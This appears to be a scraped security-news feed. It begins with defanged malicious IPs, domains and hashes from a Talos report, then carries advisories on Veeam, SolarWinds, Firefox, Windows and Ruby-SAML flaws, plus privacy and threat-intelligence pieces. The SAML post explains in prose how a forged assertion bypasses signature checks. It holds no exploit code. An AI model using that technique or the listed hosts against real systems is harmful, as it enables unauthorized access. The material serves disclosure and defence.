1fa96e7f3c26743295a6af7917837c98c1d6ac0da30a804fed820daace6f90b0

 

SingleCamper 

dee849e0170184d3773077a9e7ce63d2b767bb19e85441d9c55ee44d6f129df9
2474a6c6b3df3f1ac4eadcb8b2c70db289c066ec4b284ac632354e9dbe488e4d

 

 

Network IOCs 

213[.]139[.]205[.]23 
dnsresolver[.]online 
apisolving[.]com 
hxxp[://]apisolving[.]com:443/DKgitTDJfiP 
rdcservice[.]org 
23[.]94[.]207[.]116 
webtimeapi[.]com 
91[.]92[.]242[.]87 
wirelesszone[.]top 
hxxp[://]wirelesszone[.]top:433/OfjdDebdjas 
192[.]227[.]190[.]127 
devhubs[.]dev 
91[.]92[.]254[.]218 
pos-st[.]top 
hxxp[://]adcreative[.]pictures:443/kjLY1Ul8IMO 
adcreative[.]pictures 
91[.]92[.]248[.]75 
creativeadb[.]com 
94[.]156[.]68[.]216 
hxxp[://]creativeadb[.]com:443/n9JTcP62OvC 
193[.]42[.]36[.]131 
copdaemi[.]top 
adbefnts[.]dev 
23[.]137[.]253[.]43 
store-images[.]org 
193[.]42[.]36[.]132 
/ipns/k51qzi5uqu5dgn9wgsaxb7cfvinmk27eusoufaxrp8qd1ri5kamf41bg7gpydm

Cisco Talos Blog – ​Read More

Critical Vulnerability in Veeam Products Exploited by Ransomware Gangs

Key Takeaways


A critical vulnerability, CVE-2024-40711, was discovered in Veeam Backup & Replication, allowing unauthenticated remote code execution.

CVE-2024-40711 has a CVSS score of 9.8, indicating an urgent need for remediation due to its severity.

 Threat actors are actively exploiting this vulnerability to deploy Akira and Fog ransomware.

Veeam issued security updates to address these vulnerabilities in early September 2024.

Multiple Veeam products were also affected by different vulnerabilities, including Veeam Backup & Replication, Veeam ONE, and Veeam Agent for Linux, among others.

Organizations are urged to implement regular update protocols, enhance monitoring, and develop incident response plans to mitigate risks.

Overview

Threat actors have exploited a recent critical vulnerability in Veeam Backup & Replication to deploy Akira and Fog ransomware. This vulnerability, designated as CVE-2024-40711, is rated 9.8 out of 10.0 on the Common Vulnerability Scoring System (CVSS) scale, highlighting its severe nature. Veeam addressed this security flaw in version 12.2 of Backup & Replication, released in early September 2024.

Florian Hauser, a security researcher with CODE WHITE based in Germany, discovered the vulnerability and reported it to Veeam. Hauser emphasized the urgency of patching systems, stating, “Better patch your Veeam Backup & Replication servers! Full system takeover via CVE-2024-40711, discovered by our very own @frycos—no technical details from us this time because this might instantly be abused by ransomware gangs.”

The exploitation of this vulnerability has raised security concerns. In a recent attack linked to the Fog ransomware, threat actors managed to deploy the ransomware on an unprotected Hyper-V server. During the same operation, they utilized the rclone utility to exfiltrate sensitive data.

However, other attempts to deploy ransomware were reportedly unsuccessful. Attempted exploits picked up by Sophos endpoint detection all used compromised VPN gateways lacking multifactor authentication (MFA) to exploit Veeam on the widely exposed port 8000, triggering the Veeam.Backup.MountService.exe to launch net.exe. The exploit creates a local account, “point,” and adds it to the local Administrators and Remote Desktop Users groups.

Timely Patches and Advisory

Veeam took prompt action by disclosing the vulnerability and releasing security updates on September 4, 2024. Following this, watchTowr Labs published a technical analysis of the vulnerabilities on September 9, 2024.

Notably, they delayed the publication of proof-of-concept exploit code until September 15, 2024, to give administrators adequate time to secure their systems. Given its widespread use, Veeam’s products are a prime target for malicious actors looking for quick access to backup data, emphasizing the need for timely remediation.

Moreover, according to an advisory from Cyble, CVE-2024-40711 is just one of several vulnerabilities that affected Veeam products. The Cyble advisory released a summary of the latest vulnerabilities and patches from various vendors, focusing on the following CVEs linked to Veeam:


CVE-2024-40711: Critical, CVSS score 9.8, allowing unauthenticated remote code execution.

CVE-2024-40713: High severity.

CVE-2024-40710: High severity.

CVE-2024-39718: Medium severity.

CVE-2024-40714: High severity.

CVE-2024-40712: Medium severity.

CVE-2024-40709: Medium severity.

CVE-2024-42024: Medium severity.

CVE-2024-42019: Medium severity.

CVE-2024-42023: Medium severity.

CVE-2024-42021: Medium severity.

CVE-2024-42022: Medium severity.

CVE-2024-42020: Medium severity.

CVE-2024-38650: Medium severity.

CVE-2024-39714: Medium severity.

CVE-2024-39715: Medium severity.

CVE-2024-38651: Medium severity.

CVE-2024-40718: Medium severity.

The vulnerabilities primarily impact several Veeam products, posing significant security risks. Among these is Veeam Backup & Replication, which is widely used for data protection and disaster recovery. Additionally, the Veeam Agent for Linux is affected, as well as Veeam ONE, which provides monitoring and analytics for backup operations.

Furthermore, the Veeam Service Provider Console is included in the list of vulnerable products, along with Veeam Backup for Nutanix AHV. Lastly, Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization also face these security concerns. Organizations utilizing any of these products should take immediate action to secure their systems against potential exploitation. 

Technical Details of CVE-2024-40711

CVE-2024-40711 is classified as a remote code execution vulnerability, allowing unauthenticated attackers to send a malicious payload that can lead to a complete system takeover. The affected software versions include Veeam Backup & Replication 12.1.2.172 and all earlier versions.

During an investigation, Cyble’s ODIN scanner identified approximately 2,466 internet-exposed instances of Veeam Backup, predominantly in the United States. 

The CVE-2024-40711 vulnerability is not an isolated incident. On March 7, 2023, Veeam patched another high-severity vulnerability, CVE-2023-27532, which was exploited in attacks linked to the financially motivated FIN7 threat group, notorious for its connections to various ransomware operations including Conti, REvil, Maze, Egregor, and BlackBasta. 

Recommendations and Mitigations

Here are several mitigation and recommendation strategies for addressing the vulnerabilities in Veeam products:


Ensure that the latest patches released by Veeam are implemented immediately to address the critical vulnerabilities.

Create a routine schedule for regular updates across all Veeam products to maintain security and compliance.

Regularly perform security assessments and audits to identify and remediate potential vulnerabilities in your systems.

Isolate Veeam products from the internet wherever possible to reduce the attack surface and minimize exposure to potential threats.

Enforce MFA for accessing Veeam management interfaces to add an additional layer of security against unauthorized access.

Utilize comprehensive monitoring tools to detect suspicious activities and potential exploitation attempts in real-time.

Establish and regularly update an incident response plan that includes procedures for identifying, responding to, and recovering from security incidents.

Assess any third-party tools or integrations used with Veeam products to ensure they do not introduce additional vulnerabilities.

Conclusion

Veeam’s products, used by over 550,000 customers globally, including 74% of the Global 2000 companies, represent a dangerous risk if not properly secured. Organizations relying on Veeam’s Backup & Replication solutions must act swiftly to apply the necessary patches and protect their defenses against potential ransomware attacks. 

The post Critical Vulnerability in Veeam Products Exploited by Ransomware Gangs appeared first on Cyble.

Blog – Cyble – ​Read More

Protecting major events: An incident response blueprint

Ensuring the cybersecurity of major events — whether it’s sports, professional conferences, expos, inter-government meetings or other gatherings — is a complex and time-intensive task.  

It requires a comprehensive approach and collaboration among various stakeholders, including vendors, hospitality teams, and service providers, to establish a consistent cybersecurity strategy across the entire event ecosystem. 

In our latest version of the “Protecting major events: An incident response blueprint” whitepaper, Cisco Talos Incident Response outlines the essential steps organizations should take to secure any major event. This paper highlights 13 critical focus areas that will guide organizing committees and participating businesses, offering key questions and actionable answers to help ensure robust event security. 

Cisco Talos Blog – ​Read More

CISA Issues Urgent Advisory on Vulnerabilities Affecting Multiple Products

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has released a critical advisory report highlighting vulnerabilities recently added to the Known Exploited Vulnerability (KEV) catalog. These vulnerabilities pose risks to organizations and require immediate attention.

CISA categorizes vulnerabilities based on the Common Vulnerabilities and Exposures (CVE) naming standards and the Common Vulnerability Scoring System (CVSS). This system classifies vulnerabilities into high, medium, and low categories. High vulnerabilities are assigned scores ranging from 7.0 to 10.0; medium vulnerabilities receive scores between 4.0 and 6.9, and low vulnerabilities score between 0.0 and 3.9.

The advisory outlines specific vulnerabilities and the products they affect, including SolarWinds, Mozilla Firefox, and Microsoft Windows.

Vulnerability Details

One of the critical vulnerabilities identified is CVE-2024-28987, which affects the SolarWinds Web Help Desk (WHD) software, specifically version 12.8.3 HF1 and all earlier versions. This vulnerability is classified as critical, with a CVSS score of 9.1. It allows remote, unauthenticated users to access internal functionalities and modify data due to hardcoded credentials in the software.

Public proof-of-concept exploits for this vulnerability are readily available, highlighting its severity. According to Cyble’s ODIN scanner, approximately 920 internet-facing instances of SolarWinds WHD have been identified, primarily located in the United States.

Another vulnerability, CVE-2024-9680, affects multiple versions of Firefox and Thunderbird and has a critical CVSS score of 9.8. This vulnerability arises from a use-after-free flaw in Animation timelines, enabling an attacker to execute arbitrary code. Mozilla has acknowledged reports of this vulnerability being exploited in the wild, further emphasizing the need for immediate remediation.

The third vulnerability, CVE-2024-30088, impacts various Windows products, including Windows Server 2016 and multiple Windows 10 and 11 versions. It has a CVSS score of 7.0, classifying it as high severity. This vulnerability exploits a race condition within the Windows kernel, allowing attackers to gain SYSTEM privileges. Researchers from Trend Micro have reported observing the Advanced Persistent Threat (APT) group APT34 leveraging this vulnerability for privilege escalation in targeted systems.

Recommendations


Organizations should apply the latest patches from official vendors.

Establish a routine schedule for regularly updating all software and hardware systems.

Ensure critical updates are prioritized for immediate application to reduce exposure to exploits.

Isolate sensitive assets from less secure areas to minimize risk and reduce the attack surface.

Implement firewalls, Virtual Local Area Networks (VLANs), and access controls to limit threat exposure.

Develop and regularly update an incident response plan for detecting, responding to, and recovering from security incidents.

Conduct regular tests of the incident response plan to ensure its effectiveness against evolving threats.

Use comprehensive monitoring and logging solutions to detect and analyze suspicious activities across the network.

Utilize Security Information and Event Management (SIEM) systems for real-time threat detection and response by aggregating and correlating logs.

Proactively identify and plan for the timely upgrades or replacements of End-of-Life (EOL) products to mitigate associated risks.

Conclusion

The addition of these vulnerabilities to CISA’s KEV catalog highlights the urgent need for organizations to address them immediately. The fact that these vulnerabilities are actively exploited signifies that organizations with affected systems face heightened risks, including potential data breaches, ransomware attacks, and privilege escalation.

Organizations must promptly patch these vulnerabilities to safeguard their systems from malicious actors. By following these recommendations, organizations can significantly strengthen their cybersecurity and protect against critical vulnerabilities.

The post CISA Issues Urgent Advisory on Vulnerabilities Affecting Multiple Products appeared first on Cyble.

Blog – Cyble – ​Read More

Security and privacy settings in Nike Run Club | Kaspersky official blog

We’ve talked before about why it’s crucial to configure your privacy settings in fitness apps before you even start using them, and shared a detailed guide on general smartphone settings to minimize data risks.

The fact is, fitness tracking apps share your sensitive information — including your precise location. Strava in particular stands out, since it shares almost all your training data by default. We’ve already covered how to set privacy in Strava in detail.

Other running apps have fewer privacy settings than Strava — and they are stricter by default (at least for new users signing up now). Nevertheless, it’s worth reviewing these settings as well, as there are a few things you might want to turn off.

The app of the world’s largest sportswear manufacturer — Nike Run Club (available for both Android and iOS) — tucks its privacy settings away in a not-so-obvious place. Here’s how to find them: in the top left corner, tap the gray round icon with your initials. Then, tap Settings. In the window that opens, you won’t find some “Privacy” section; instead, the relevant settings are scattered throughout.

Where to find privacy settings in the Nike Run Club app

Firstly, make sure your profile isn’t public: to do this, tap Profile Visibility, and check where the tick mark is. The best choice from a privacy perspective would be Friends (social), or even better, Only Me (private).

Secondly, prevent Nike from selling your data for “personalized advertising”. To do this, go to Your Privacy Choices and turn on the Do Not Share My Information toggle switch.

Thirdly, prevent Nike itself from using your data for internal purposes. To do this, go to the innocuously named Workout Info section and turn off the Use My Workout Info toggle switch.

Don’t overlook these key Nike Run Club settings

You may also want to look at Notifications Preference, Friend Tagging, and Friend Leaderboard. And if at some point you decide to quit Nike Run Club altogether, don’t forget to delete your profile by tapping Delete Account at the bottom of the settings list.

Using other running apps to track your workouts? We’ve got you covered with privacy guides for:

Strava
MapMyRun
adidas Running (formerly Runtastic)
ASICS Runkeeper

You can also find guides on setting up privacy in other apps — from social networks to browsers — on our website Privacy Checker.

And Kaspersky Premium will maximize your privacy and safeguard you from digital identity theft on all your devices.

Don’t forget to subscribe to our blog for more how-to guides and useful articles to always stay one step ahead of scammers.

Kaspersky official blog – ​Read More

Cyber Information Gathering: Techniques and Tools for Effective Threat Research 

To stay safe from cyber attacks, organizations need effective ways to gather information about threats before they cause irreparable damage. Let’s look at several methods for gathering threat intelligence (TI) to see how they can help you gain a better view of the current threat landscape. 

Why is Threat Intelligence Important? 

Threat intelligence is important for several reasons: 

Proactive Awareness: Knowing about potential threats helps organizations take steps to deal with them before they escalate. 

Quick Response: When an attack happens, having threat intelligence allows teams to respond faster and more effectively. 

Better Risk Management: Understanding vulnerabilities helps organizations prioritize where to focus their security efforts. 

How to Collect Cyber Threat Intelligence 

Gathering threat intelligence isn’t just about knowing where to look; it’s about understanding how to use those sources effectively. Let’s explore key methods for collecting threat intelligence, diving into the techniques and tools that can help cybersecurity professionals. 

Integrating Threat Intelligence Feeds 

Threat intelligence feeds provide real-time streams of data on malware, vulnerabilities, and emerging risks. By using these feeds, organizations can stay up-to-date with the latest threats and trends. To effectively gather intelligence: 

Automate Data Collection: Integrate feeds with your cybersecurity tools (like SIEM) for continuous monitoring. 

Correlate Information: Use multiple feeds to cross-reference threats and identify patterns. 

Customize for Relevance: Focus on feeds that provide the most pertinent information for your industry or organization’s needs. 

Using Threat Intelligence Portals 

Threat intelligence portals centralize data and allow for comprehensive threat analysis. ANY.RUN‘s TI Lookup is an example of a tool that helps with such analysis. Using TI Lookup, users can: 

Investigate Indicators: Enter suspicious IP addresses, domains, or file hashes to gain insights into potential threats. 

Search for Known Threats: Use the portal to research malware, attack methods, or Indicators of Compromise (IOCs). 

Analyze Attack Techniques: The tool can also be used to link threats to known tactics and vice versa, such as those in the MITRE ATT&CK framework, helping users understand the nature of the threats they face. 

Try Threat Intelligence
from ANY.RUN

Explore TI Feeds and TI Lookup
to see how they can help you achieve better threat visibility.



Monitoring Dark Web Forums 

The Dark Web is often a hub for cybercriminal activities. Monitoring these forums can yield valuable information about planned attacks, new exploit techniques, and stolen data. Key steps include: 

Forum Monitoring Tools: Use automated tools to track conversations on Dark Web forums, collecting insights into new attack vectors. 

Analyze Discussions: Gather intelligence on specific threat actors, potential targets, and trends emerging in cybercrime

By keeping an eye on dark web forums, organizations can stay aware of evolving threats before they escalate. 

Reviewing Publicly Available Reports 

Cybersecurity organizations regularly release reports and threat research that provide detailed analyses of recent attacks and vulnerabilities. These reports are invaluable for keeping up with emerging threats. To use them effectively: 

Review Reports for Trends: Look for trends in the attacks, methods, and vulnerabilities discussed. 

Implement Recommendations: Use insights from these reports to adjust security practices and defense strategies. 

Data Mining for Threat Intelligence 

Data mining is a powerful method for extracting useful intelligence from large datasets. It allows security teams to identify patterns and anomalies that indicate potential threats: 

Anomaly Detection: By analyzing network traffic and system logs, data mining techniques can reveal suspicious behavior that may indicate an attack in progress. 

Predictive Analytics: Historical data can be analyzed to predict future attack trends, helping organizations take preventative measures. 

Deploying Honeypots 

Honeypots are decoy systems set up to attract cybercriminals. These fake targets are used to observe attackers and gather intelligence on their tactics and methods. To use honeypots effectively: 

Simulate Real Systems: Honeypots should mimic genuine vulnerabilities to lure attackers. 

Gather Attack Data: Record all interactions with the honeypot to study the attackers’ methods, tools, and behaviors in a controlled environment. 

Honeypots provide invaluable insights into how attackers operate, enabling organizations to improve their defensive strategies based on real-world data. 

Crowdsourcing Threat Intelligence 

Collaboration is another valuable tool for collecting threat intelligence. Crowdsourcing allows organizations to benefit from the collective knowledge of the broader cybersecurity community: 

Threat Intelligence Sharing: Platforms like ISACs (Information Sharing and Analysis Centers) enable the exchange of threat data across industries.

Collaborative Investigations: Participating in shared investigations can help identify complex threats and provide faster, more accurate responses.

Threat Sample Databases: There sources like ANY.RUN’s Public submissions database, containing millions of public sandbox analyses of the latest malware and phishing samples.

Crowdsourcing creates a network of shared defense, helping organizations quickly identify emerging threats and stay updated on the latest attack vectors. 

How to Gather Cyber Threat Intelligence with TI Lookup

Gathering cyber threat intelligence involves utilizing various tools and techniques.

ANY.RUN’s TI Lookup simplifies this process by offering a centralized repository of millions of IOCs, extracted from ANY.RUN’s extensive database of interactive malware analysis sessions.

You can use over 40 search parameters to investigate search this database, turning isolated data points into a comprehensive understanding of persistent and emerging threats. 

Key Benefits of TI Lookup for researchers: 

Comprehensive Threat Data: Access detailed threat intelligence by analyzing processes, files, network traffic, and more. TI Lookup links related IOCs, helping you fully understand the scope and impact of an attack. 

Fast and Accurate Searches: With 2-second response time and 1,000 new entries daily, TI Lookup provides swift access to the latest threat intelligence. 

Seamless Integration: Whether using the web interface or API, TI Lookup integrates easily with your existing security tools like Splunk

By using ANY.RUN TI Lookup, your security team can efficiently investigate threats, reduce risks, and enhance your overall cybersecurity posture.  

Here are a few examples using ANY.RUN TI Lookup: 

Analyzing Destination IPs

You can enter a suspicious IP address into TI Lookup to see if it is linked to any threat. 

TI Lookup results related to a suspicious IP address

The tool will display details such as the IP’s location and any associated indicators, samples, and sandbox sessions, giving you crucial insights into potential risks. 

Threat Name Investigation 

You can also identify the latest samples of a known threat using its name. 

TI Lookup results related to the Lumma Stealer malware

You will receive detailed information about the threat, including its behavior and Indicators of Compromise. This helps in understanding how the threat operates. 

Identifying Threats via MITRE ATT&CK TTPs

ANY.RUN’s TI Lookup lets you search using specific tactics or techniques of the MITRE ATT&CK framework. 

TI Lookup results related to a specific TTP

The tool will show relevant examples of how these techniques are used in attacks, helping you understand their application in real-world scenarios. 

Using ANY.RUN TI Lookup, cybersecurity teams can efficiently gather threat intelligence, investigate malware behavior, and equip themselves with the knowledge needed to combat emerging threats. 

Learn to investigate threats

Discover a practical guide
to gathering Threat Intelligence with TI Lookup from a seasoned researcher.

See real-world use cases



Wrapping up 

Gathering cyber threat intelligence is essential for understanding and combating cyber threats. By using various sources like threat intelligence feeds, dark web forums, publicly available reports, and tools like ANY.RUN TI Lookup, organizations can improve their awareness of potential risks. Being informed about these threats is a key part of a strong cybersecurity strategy. 

About ANY.RUN     

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Request free trial of ANY.RUN’s products →

The post Cyber Information Gathering: Techniques <br>and Tools for Effective Threat Research  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Active Exploitation of SAML Vulnerability CVE-2024-45409 Detected by Cyble Sensors

Overview

On September 10, 2024, a critical vulnerability, CVE-2024-45409, was identified by ahacker1 of SecureSAML. The vulnerability was then patched in the Ruby-SAML library, which is widely used for implementing SAML (Security Assertion Markup Language) authorization.

This flaw affects Ruby-SAML versions up to 1.12.2 and between 1.13.0 and 1.16.0 and stems from an incorrect XPath selector that prevents the proper verification of the SAML Response signature. An unauthenticated attacker with access to a signed SAML document from a legitimate identity provider (IdP) can exploit this vulnerability by forging a SAML Response or Assertion. This allows the attacker to bypass the authentication mechanism and potentially gain unauthorized access to sensitive data and critical systems.

SAML is widely used in web applications, especially those that implement Single Sign-On (SSO) mechanisms for user authentication across different platforms or services. It is also used in multiple versions of GitLab Community Edition (CE) and Enterprise Edition (EE).

On September 17, 2024, GitLab issued an important update to address the critical vulnerability identified in the Ruby-SAML library. This update impacts multiple versions of GitLab Community Edition (CE) and Enterprise Edition (EE), specifically those released prior to 17.3.3, 17.2.7, 17.1.8, 17.0.8, and 16.11.10. Users are strongly encouraged to upgrade to these patched versions to protect from potential exploitation of this vulnerability.

Following GitLab’s patch, researchers from ProjectDiscovery provided a detailed analysis of the SAML vulnerability and demonstrated how it could be exploited to gain unauthorized access to GitLab accounts. The figure below shows the video demonstration of POC gaining unauthorized access to a GitLab account.

Amid these findings, Cyble Global Sensor Intelligence (CGSI) identified a scanning attempt associated with CVE-2024-45409.

Cyble Global Sensor Intelligence (CGSI) findings

On October 8, 2024, Cyble Global Sensor Intelligence (CGSI) identified attempts to exploit the newly disclosed vulnerability, CVE-2024-45409. Analysis of the detected URL patterns suggests that threat actors may be actively scanning for vulnerable GitLab accounts to exploit this particular flaw. This activity suggests a possible ongoing campaign aimed at exploiting CVE-2024-45409, potentially involving systematic probing of GitLab instances to identify entry points.

Vulnerability Details

Authentication bypass

CVE-2024-45409

CVSSv3.1

9.8

Severity

Critical

Vulnerable Software Versions

Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0

Description

The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as an arbitrary user within the vulnerable system.

Technical details

SAML is a widely adopted protocol for exchanging authentication and authorization data between identity providers (IdPs) and service providers (SPs). A vital aspect of securing this exchange is verifying data integrity and authenticity through digital signatures and digest verification.

CVE-2024-45409 introduces a vulnerability that enables attackers to circumvent the signature validation process, provided they obtain the SAML Response issued by the identity provider. An attacker with access to any signed SAML document can forge a SAML Response or Assertion by inserting their own digest value within the samlp:extensions element. This alteration tricks the XPath parser, causing it to extract the smuggled DigestValue from the samlp:extensions element rather than the one in the SignedInfo block.

As a result, the attacker bypasses the signature verification, enabling them to authenticate their own forged assertion and effectively bypass the authentication mechanism.

Conclusion

CVE-2024-45409 presents a significant risk in the Ruby-SAML library. It enables attackers to forge SAML Responses and gain unauthorized access to systems due to inadequate verification of the SAML Response signature. This vulnerability highlights the urgent need for action, particularly as GitLab, a widely used platform, is especially susceptible to this issue. Furthermore, the recent detection of exploitation attempts by CGSI further underscores the severity of this threat.

Mitigation

GitLab advises self-managed users to implement two mitigation measures to lessen the risk of exploitation:


Enable two-factor authentication for all user accounts on the self-managed GitLab instance. (Note: Activating multi-factor authentication on the identity provider does not address this vulnerability.)

Disable the SAML two-factor bypass option within GitLab.

Recommendations


Update the Ruby-SAML library to the latest version, where the vulnerability has been patched.

Ensure multi-factor authentication (MFA) is enabled on your accounts to add an extra layer of security.

Organizations should conduct regular security awareness and information security training for employees.

References

https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass

https://github.com/advisories/GHSA-jw9c-mfg7-9rx2

https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released

The post Active Exploitation of SAML Vulnerability CVE-2024-45409 Detected by Cyble Sensors appeared first on Cyble.

Blog – Cyble – ​Read More